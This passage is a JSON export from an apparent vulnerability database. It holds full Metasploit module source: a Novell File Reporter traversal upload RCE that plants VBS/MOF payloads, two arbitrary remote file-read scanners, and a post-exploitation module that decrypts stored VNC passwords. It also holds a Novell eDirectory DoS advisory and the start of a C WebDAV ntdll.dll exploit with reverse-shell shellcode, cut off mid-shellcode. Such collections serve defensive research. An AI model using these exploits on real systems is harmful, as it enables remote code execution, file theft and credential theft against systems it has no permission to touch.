Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n print_status(\"Sending malicious request...\")\n remote_exe(payload.encoded)\n end\n\n\nend\n", "cvss": {"score": 0.0, "vector": 
"NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/narcissus_backend_exec.rb"}, {"lastseen": "2019-11-26T04:50:50", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload arbitrary files via a directory traversal while handling requests to /FSF/CMD with FSFUI records with UICMD 130. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2019-08-02T14:48:53", "published": "2012-11-16T15:03:09", "id": "MSF:EXPLOIT/WINDOWS/NOVELL/FILE_REPORTER_FSFUI_UPLOAD", "href": "", "type": "metasploit", "title": "NFR Agent FSFUI Record File Upload RCE", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NFR Agent FSFUI Record File Upload RCE',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to upload\n arbitrary files via a directory traversal while handling requests to /FSF/CMD with\n FSFUI records with UICMD 130. 
This module has been tested successfully against NFR\n Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'References' =>\n [\n [ 'CVE', '2012-4959'],\n [ 'OSVDB', '87573' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Payload' =>\n {\n 'Space' => 2048,\n 'StackAdjustment' => -3500\n },\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 20\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 16 2012'))\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptInt.new('DEPTH', [true, 'Traversal depth', 6])\n ])\n\n self.needs_cleanup = true\n end\n\n def on_new_session(client)\n\n return if not @var_mof_name\n return if not @var_vbs_name\n\n if client.type != \"meterpreter\"\n print_error(\"NOTE: you must use a Meterpreter payload in order to automatically clean up.\")\n print_error(\"The following files must be removed manually:\")\n print_error(\"The VBS payload: %WINDIR%\\\\system32\\\\#{@var_vbs_name}.vbs\")\n print_error(\"The MOF file (%WINDIR%\\\\system32\\\\wbem\\\\mof\\\\good\\\\#{@var_mof_name}.mof)\")\n return # That's it\n end\n\n # stdapi must be loaded before we can use fs.file\n client.core.use(\"stdapi\") if not client.ext.aliases.include?(\"stdapi\")\n\n begin\n print_good(\"Deleting the VBS payload \\\"#{@var_vbs_name}.vbs\\\" ...\")\n windir = client.sys.config.getenv('WINDIR')\n client.fs.file.rm(\"#{windir}\\\\system32\\\\\" + @var_vbs_name + \".vbs\")\n print_good(\"Deleting the MOF file \\\"#{@var_mof_name}.mof\\\" ...\")\n cmd = \"#{windir}\\\\system32\\\\attrib.exe -r \" +\n \"#{windir}\\\\system32\\\\wbem\\\\mof\\\\good\\\\\" + @var_mof_name + \".mof\"\n client.sys.process.execute(cmd, nil, {'Hidden' => true })\n 
client.fs.file.rm(\"#{windir}\\\\system32\\\\wbem\\\\mof\\\\good\\\\\" + @var_mof_name + \".mof\")\n rescue ::Exception => e\n print_error(\"Exception: #{e.inspect}\")\n end\n\n end\n\n def exploit\n\n # In order to save binary data to the file system the payload is written to a .vbs\n # file and execute it from there.\n @var_mof_name = rand_text_alpha(rand(5)+5)\n @var_vbs_name = rand_text_alpha(rand(5)+5)\n\n print_status(\"Encoding payload into VBS...\")\n payload = generate_payload_exe\n vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating VBS file...\")\n mof_content = generate_mof(\"#{@var_mof_name}.mof\", \"#{@var_vbs_name}.vbs\")\n\n print_status(\"Uploading the VBS file\")\n worked = upload_file(\"WINDOWS\\\\system32\\\\#{@var_vbs_name}.vbs\", vbs_content)\n unless worked\n fail_with(Failure::NotVulnerable, \"Failed to upload the file\")\n end\n\n print_status(\"Uploading the MOF file\")\n upload_file(\"WINDOWS\\\\system32\\\\wbem\\\\mof\\\\#{@var_mof_name}.mof\", mof_content)\n end\n\n def upload_file(filename, content)\n traversal = \"..\\\\\" * datastore['DEPTH']\n traversal << filename\n\n record = \"<RECORD><NAME>FSFUI</NAME><UICMD>130</UICMD><FILE>#{traversal}</FILE><![CDATA[#{content}]]></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and res.body.include? 
\"<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>\"\n print_warning(\"File successfully uploaded: #(unknown)\")\n else\n print_error(\"Failed to upload the file\")\n return false\n end\n\n true\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/novell/file_reporter_fsfui_upload.rb"}, {"lastseen": "2019-10-22T03:53:15", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary text files via a directory traversal while handling requests to /FSF/CMD with an FSFUI record with UICMD 126. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-16T15:03:09", "id": "MSF:AUXILIARY/SCANNER/HTTP/NOVELL_FILE_REPORTER_FSFUI_FILEACCESS", "href": "", "type": "metasploit", "title": "NFR Agent FSFUI Record Arbitrary Remote File Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'NFR Agent FSFUI Record Arbitrary Remote File Access',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary text files via a directory traversal while handling requests to /FSF/CMD\n with an FSFUI record with UICMD 126. 
This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).\n },\n 'References' =>\n [\n [ 'CVE', '2012-4958' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Nov 16 2012\"\n )\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('RFILE', [true, 'Remote File', 'windows\\\\win.ini']),\n OptInt.new('DEPTH', [true, 'Traversal depth', 6])\n ])\n\n end\n\n def run_host(ip)\n\n traversal = \"..\\\\\" * datastore['DEPTH']\n record = \"<RECORD><NAME>FSFUI</NAME><UICMD>126</UICMD><FILE>#{traversal}#{datastore['RFILE']}</FILE></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n print_status(\"Retrieving the file contents\")\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and res.body =~ /<RESULT><VERSION>1<\\/VERSION><STATUS>0<\\/STATUS><CFILE><\\!\\[CDATA\\[(.*)\\]\\]><\\/CFILE><\\/RESULT>/m\n loot = $1\n f = ::File.basename(datastore['RFILE'])\n path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])\n print_good(\"#{datastore['RFILE']} saved in #{path}\")\n else\n print_error(\"Failed to retrieve the file contents\")\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb"}, {"lastseen": "2019-12-03T11:40:59", "bulletinFamily": "exploit", "description": "NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve arbitrary 
files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and CMD 103, specifying a full pathname. This module has been tested successfully against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1).\n", "modified": "2019-03-05T09:38:51", "published": "2012-11-16T15:03:09", "id": "MSF:AUXILIARY/SCANNER/HTTP/NOVELL_FILE_REPORTER_SRS_FILEACCESS", "href": "", "type": "metasploit", "title": "NFR Agent SRS Record Arbitrary Remote File Access", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'NFR Agent SRS Record Arbitrary Remote File Access',\n 'Description' => %q{\n NFRAgent.exe, a component of Novell File Reporter (NFR), allows remote attackers to retrieve\n arbitrary files via a request to /FSF/CMD with a SRS Record with OPERATION 4 and\n CMD 103, specifying a full pathname. 
This module has been tested successfully\n against NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File\n Reporter 1.0.1).\n },\n 'References' =>\n [\n [ 'CVE', '2012-4957' ],\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959' ]\n ],\n 'Author' =>\n [\n 'juan vazquez'\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => \"Nov 16 2012\"\n )\n\n register_options(\n [\n Opt::RPORT(3037),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('RFILE', [true, 'Remote File', 'c:\\\\windows\\\\win.ini'])\n ])\n\n register_autofilter_ports([ 3037 ])\n end\n\n def run_host(ip)\n\n record = \"<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>#{datastore['RFILE']}</PATH></RECORD>\"\n md5 = Rex::Text.md5(\"SRS\" + record + \"SERVER\").upcase\n message = md5 + record\n\n print_status(\"Retrieving the file contents\")\n\n res = send_request_cgi(\n {\n 'uri' => '/FSF/CMD',\n 'version' => '1.1',\n 'method' => 'POST',\n 'ctype' => \"text/xml\",\n 'data' => message\n })\n\n if res and res.code == 200 and not res.body =~ /<RESULT>/\n loot = res.body\n f = ::File.basename(datastore['RFILE'])\n path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])\n print_good(\"#{datastore['RFILE']} saved in #{path}\")\n else\n print_error(\"Failed to retrieve the file contents\")\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb"}, {"lastseen": "2019-11-05T18:21:27", "bulletinFamily": "exploit", "description": "This module extract DES encrypted passwords in known VNC locations\n", "modified": "2017-07-24T13:26:21", "published": "2011-08-10T17:48:30", "id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/VNC", "href": "", "type": "metasploit", "title": "Windows 
Gather VNC Password Extraction", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\nrequire 'rex/proto/rfb'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n include Msf::Post::Windows::UserProfiles\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Gather VNC Password Extraction',\n 'Description' => %q{\n This module extract DES encrypted passwords in known VNC locations\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kurt Grutzmacher <grutz[at]jingojango.net>',\n 'mubix'\n ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n\n end\n\n def decrypt_hash(hash)\n if hash == nil\n return nil\n end\n # fixed des key\n # 5A B2 CD C0 BA DC AF 13\n fixedkey = \"\\x17\\x52\\x6b\\x06\\x23\\x4e\\x58\\x07\"\n pass = Rex::Proto::RFB::Cipher.decrypt [\"#{hash}\"].pack('H*'), fixedkey\n pass.gsub(/\\0/, '')\n end\n\n # Pull encrypted passwords from file based storage\n def file_get(filename,splitvar)\n begin\n client.fs.file.stat(filename)\n config = client.fs.file.new(filename,'r')\n parse = config.read.split\n value = parse.at(parse.index{|x| x =~ /#{splitvar}/}).split(splitvar)[1]\n return value\n rescue\n return nil\n end\n end\n\n\n\n # Pull encrypted passwords from registry based storage\n def reg_get(key,variable)\n begin\n root_key, base_key = session.sys.registry.splitkey(key)\n open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)\n\n data = open_key.query_value(variable).data\n if data.kind_of? 
Integer\n return data\n else\n value = data.unpack('H*')[0].to_s\n return value\n end\n rescue\n # Registry value not found\n return nil\n end\n end\n\n def run\n\n '''\n Hash format\n :name,\n :check_file,\n :check_reg,\n :pass_variable,\n :port_variable,\n :port,\n :hash,\n :pass,\n :viewonly_variable,\n :viewonly_hash,\n :viewonly_pass\n '''\n\n locations = []\n\n #Checks\n progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')\n progfiles_env.each do |k, v|\n next if v.blank?\n locations << {:name => 'UltraVNC',\n :check_file => \"#{v}\\\\UltraVNC\\\\ultravnc.ini\",\n :pass_variable => 'passwd=',\n :viewonly_variable => 'passwd2=',\n :port_variable => 'PortNumber='}\n end\n\n #check uninstall key\n begin\n root_key, base_key = session.sys.registry.splitkey(\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\Ultravnc2_is1\")\n open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)\n vnclocation = open_key.query_value(\"InstallLocation\").data\n locations << {:name => 'UltraVNC',\n :check_file => vnclocation + \"\\\\ultravnc.ini\",\n :pass_variable => 'passwd=',\n :viewonly_variable => 'passwd2=',\n :port_variable => 'PortNumber='}\n rescue Rex::Post::Meterpreter::RequestError => e\n vprint_error(e.message)\n end\n\n locations << {:name => 'WinVNC3_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC3',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC3',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKLM_Default',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC3\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC3_HKCU_Default',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC3\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n 
locations << {:name => 'WinVNC_HKLM_Default',\n :check_reg => 'HKLM\\\\Software\\\\ORL\\\\WinVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC_HKCU_Default',\n :check_reg => 'HKCU\\\\Software\\\\ORL\\\\WinVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC4_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\RealVNC\\\\WinVNC4',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'WinVNC4_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\RealVNC\\\\WinVNC4',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'RealVNC_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\RealVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'RealVNC_HKCU',\n :check_reg => 'HKCU\\\\Software\\\\RealVNC\\\\Default',\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => 'TightVNC_HKLM',\n :check_reg => 'HKLM\\\\Software\\\\TightVNC\\\\Server',\n :pass_variable => 'Password',\n :port_variable => 'RfbPort'}\n\n locations << {:name => 'TightVNC_HKLM_Control_pass',\n :check_reg => 'HKLM\\\\Software\\\\TightVNC\\\\Server',\n :pass_variable => 'ControlPassword',\n :port_variable => 'RfbPort'}\n\n userhives=load_missing_hives()\n userhives.each do |hive|\n next if hive['HKU'] == nil\n locations << {:name => \"RealVNC_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\RealVNC\\\\Default\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC4_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\RealVNC\\\\WinVNC4\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC_#{hive['SID']}_Default\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC\\\\Default\",\n :pass_variable 
=> 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC3_#{hive['SID']}_Default\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC3\\\\Default\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n\n locations << {:name => \"WinVNC3_#{hive['SID']}\",\n :check_reg => \"#{hive['HKU']}\\\\Software\\\\ORL\\\\WinVNC3\",\n :pass_variable => 'Password',\n :port_variable => 'PortNumber'}\n end\n\n print_status(\"Enumerating VNC passwords on #{sysinfo['Computer']}\")\n\n locations.map { |e|\n vprint_status(\"Checking #{e[:name]}...\")\n if e.has_key?(:check_reg)\n e[:port] = reg_get(e[:check_reg],e[:port_variable])\n e[:hash] = reg_get(e[:check_reg],e[:pass_variable])\n e[:pass] = decrypt_hash(e[:hash])\n if e.has_key?(:viewonly_variable)\n e[:viewonly_hash] = reg_get(e[:check_reg],e[:viewonly_variable])\n e[:viewonly_pass] = decrypt_hash(e[:viewonly_hash])\n end\n elsif e.has_key?(:check_file)\n e[:port] = file_get(e[:check_file],e[:port_variable])\n e[:hash] = file_get(e[:check_file],e[:pass_variable])\n e[:pass] = decrypt_hash(e[:hash])\n if e.has_key?(:viewonly_variable)\n e[:viewonly_hash] = file_get(e[:check_file],e[:viewonly_variable])\n e[:viewonly_pass] = decrypt_hash(e[:viewonly_hash])\n end\n end\n #reporting\n if e[:pass] != nil\n if e[:port] == nil\n e[:port] = 5900\n end\n print_good(\"Location: #{e[:name]} => Hash: #{e[:hash]} => Password: #{e[:pass]} => Port: #{e[:port]}\")\n\n service_data = {\n address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n port: e[:port],\n service_name: 'vnc',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n # Assemble data about the credential objects we will be creating\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n private_type: :password,\n private_data: \"#{e[:pass]}\"\n }\n\n # Merge the service data into the credential data\n credential_data.merge!(service_data)\n\n # Create the 
Metasploit::Credential::Core object\n credential_core = create_credential(credential_data)\n\n # Assemble the options hash for creating the Metasploit::Credential::Login object\n login_data ={\n access_level: 'interactive',\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # Merge in the service data and create our Login\n login_data.merge!(service_data)\n login = create_credential_login(login_data)\n\n end\n if e[:viewonly_pass] != nil\n print_good(\"VIEW ONLY: #{e[:name]} => #{e[:viewonly_hash]} => #{e[:viewonly_pass]} on port: #{e[:port]}\")\n\n service_data = {\n address: ::Rex::Socket.getaddress(session.sock.peerhost, true),\n port: e[:port],\n service_name: 'vnc',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n # Assemble data about the credential objects we will be creating\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n private_type: :password,\n private_data: \"#{e[:viewonly_pass]}\"\n }\n\n # Merge the service data into the credential data\n credential_data.merge!(service_data)\n\n # Create the Metasploit::Credential::Core object\n credential_core = create_credential(credential_data)\n\n # Assemble the options hash for creating the Metasploit::Credential::Login object\n login_data ={\n access_level: 'view_only',\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n # Merge in the service data and create our Login\n login_data.merge!(service_data)\n login = create_credential_login(login_data)\n\n end\n }\n unload_our_hives(userhives)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/vnc.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "description": "Crash on SOAP novell.embox.connmgr.serverinfo action request processing.", "modified": 
"2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:VULN:10670", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10670", "title": "Novell eDirectory DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-024\r\nMarch 2, 2010\r\n\r\n-- Affected Vendors:\r\nNovell\r\n\r\n-- Affected Products:\r\nNovell eDirectory\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8289. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to deny services on\r\nvulnerable installations of Novell eDirectory Server. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the NDS daemon's SOAP service. When a\r\nmalformed request is made to the novell.embox.connmgr.serverinfo SOAP\r\naction, the daemon makes an illegal reference thereby resulting in a\r\ndenial of service.\r\n\r\n\r\n-- Vendor Response:\r\nNovell has issued an update to correct this vulnerability. 
More\r\ndetails can be found at:\r\n\r\nhttp://www.novell.com/support/viewContent.do?externalId=7005341\r\n\r\n-- Disclosure Timeline:\r\n2009-03-13 - Vulnerability reported to vendor\r\n2010-03-02 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * 1c239c43f521145fa8385d64a9c32243\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. 
Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "SECURITYVULNS:DOC:23323", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23323", "title": "ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-04-10T00:23:40", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2003-03-23T00:00:00", "published": "2003-03-23T00:00:00", "id": "1337DAY-ID-8289", "href": "https://0day.today/exploit/description/8289", "type": "zdt", "title": "MS Windows WebDAV (ntdll.dll) Remote Exploit", "sourceData": "============================================\r\nMS Windows WebDAV (ntdll.dll) Remote Exploit\r\n============================================\r\n\r\n/*******************************************************************/\r\n/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */\r\n/* --------------------------------------------------------------- */\r\n/* this is the exploit for ntdll.dll through WebDAV. */\r\n/* run a netcat ex: nc -L -vv -p 666 */\r\n/* wb server.com your_ip 666 0 */\r\n/* the shellcode is a reverse remote shell */\r\n/* you need to pad a bit.. the best way I think is launching */\r\n/* the exploit with pad = 0 and after that, the server will be */\r\n/* down for a couple of seconds, now retry with pad at 1 */\r\n/* and so on..pad 2.. pad 3.. 
if you haven't the shell after */\r\n/* something like pad at 10 I think you better to restart from */\r\n/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */\r\n/* on all the others servers it was at 2,3,4, etc..sometimes */\r\n/* you can have the force with you, and get the shell in 1 try */\r\n/* sometimes you need to pad more than 10 times ;) */\r\n/* the shellcode was coded by myself, it is SEH + ScanMem to */\r\n/* find the famous offsets (GetProcAddress).. */\r\n/* */\r\n/*******************************************************************/\r\n\r\n\r\n#include <winsock.h>\r\n#include <windows.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment (lib,\"ws2_32\")\r\n\r\nchar shellc0de[] =\r\n\"\\x55\\x8b\\xec\\x33\\xc9\\x53\\x56\\x57\\x8d\\x7d\\xa2\\xb1\\x25\\xb8\\xcc\\xcc\"\r\n\"\\xcc\\xcc\\xf3\\xab\\xeb\\x09\\xeb\\x0c\\x58\\x5b\\x59\\x5a\\x5c\\x5d\\xc3\\xe8\"\r\n\"\\xf2\\xff\\xff\\xff\\x5b\\x80\\xc3\\x10\\x33\\xc9\\x66\\xb9\\xb5\\x01\\x80\\x33\"\r\n\"\\x95\\x43\\xe2\\xfa\\x66\\x83\\xeb\\x67\\xfc\\x8b\\xcb\\x8b\\xf3\\x66\\x83\\xc6\"\r\n\"\\x46\\xad\\x56\\x40\\x74\\x16\\x55\\xe8\\x13\\x00\\x00\\x00\\x8b\\x64\\x24\\x08\"\r\n\"\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x58\\x5d\\x5e\\xeb\\xe5\\x58\\xeb\\xb9\\x64\"\r\n\"\\xff\\x35\\x00\\x00\\x00\\x00\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x48\\x66\\x81\"\r\n\"\\x38\\x4d\\x5a\\x75\\xdb\\x64\\x8f\\x05\\x00\\x00\\x00\\x00\\x5d\\x5e\\x8b\\xe8\"\r\n\"\\x03\\x40\\x3c\\x8b\\x78\\x78\\x03\\xfd\\x8b\\x77\\x20\\x03\\xf5\\x33\\xd2\\x8b\"\r\n\"\\x06\\x03\\xc5\\x81\\x38\\x47\\x65\\x74\\x50\\x75\\x25\\x81\\x78\\x04\\x72\\x6f\"\r\n\"\\x63\\x41\\x75\\x1c\\x81\\x78\\x08\\x64\\x64\\x72\\x65\\x75\\x13\\x8b\\x47\\x24\"\r\n\"\\x03\\xc5\\x0f\\xb7\\x1c\\x50\\x8b\\x47\\x1c\\x03\\xc5\\x8b\\x1c\\x98\\x03\\xdd\"\r\n\"\\x83\\xc6\\x04\\x42\\x3b\\x57\\x18\\x75\\xc6\\x8b\\xf1\\x56\\x55\\xff\\xd3\\x83\"\r\n\"\\xc6\\x0f\\x89\\x44\\x24\\x20\\x56\\x55\\xff\\xd3\\x8b\\xec\\x81\\xec\\x94\\x00\"\r\n\"\\x00\\x00\\x83\\xc6\\x0d\\x56\\xff\\xd0\\x89\\x85\\x
